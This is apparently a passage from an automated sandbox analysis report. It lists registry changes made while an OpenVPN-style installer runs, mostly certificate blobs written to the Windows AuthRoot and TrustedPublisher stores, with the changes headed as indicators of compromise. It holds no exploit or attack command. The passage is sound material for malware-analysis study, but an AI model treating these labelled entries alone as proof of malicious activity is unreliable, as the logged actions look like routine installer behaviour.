\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\WnfLastTimeStamps\WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = "1636062494" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe -
Modifies registry class 13 IoCs
Processes:
Explorer.EXEvpn.tmpCalculator.exeSettings.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node vpn.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{7CF6631E-6809-4839-9907-43BC312765E5} Calculator.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D5066D1F-9390-4201-834C-1CCAED000709} Settings.exe -
Processes:
installer.exeinstaller.exevpn.tmpdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 